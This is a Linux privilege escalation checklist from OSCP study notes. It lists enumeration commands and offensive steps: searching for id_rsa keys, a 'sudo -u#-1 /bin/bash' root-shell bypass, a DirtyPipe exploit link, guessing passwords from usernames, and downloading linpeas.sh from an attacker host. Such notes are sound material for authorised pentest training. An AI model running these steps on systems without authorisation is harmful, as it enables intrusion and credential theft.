// notes/ PrivEsc — Linux
🐧
Checklist
Notes from oscp.adot8.com — linux privilege escalation.
#linux privilege escalation#adot8
source · oscp.adot8.com · linux-privilege-escalation/checklist ↗Checklist
code
01idcode
01find / -group <groups> 2>/dev/nullcode
01historycode
01sudo -lcode
01sudo -V | grep versioncode
01find / -name id_rsa 2>/dev/null{% hint style="info" %} Research any binary with a SUID bit that looks out of place
https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits
DirtyPipe can be used to abuse custom SUID binaries
- 5.16.11
- 5.15.25
- 5.10.102
- 5.9.0 {% endhint %}
code
01ls -la /etc/passwd /etc/shadowcode
01cat /etc/crontab02crontab -lcode
01getcap -r / 2>/dev/null02/usr/sbin/getcap -r / 2>/dev/nullcode
01cat /etc/exportscode
01ls -la /var/backupscode
01sudo -u#-1 /bin/bashcode
01dpkg -lcode
01cat .bashrc{% hint style="info" %} Snoop on processes using pspy - some cron jobs may be running in the background
Research and enumerate literally every cron job running {% endhint %}
{% hint style="info" %} su into other users using their usernames as passwords; vagrant:vagrant {% endhint %}
Search for credentials in files
Run PEAS and LinEnum
code
01wget 192.168.45.x/linpeas.sh 02curl 192.168.45.x/linpeas.sh -o linpeas.sh03chmod +x linpeas.sh{% hint style="danger" %} Search for exploits for sudo version {% endhint %}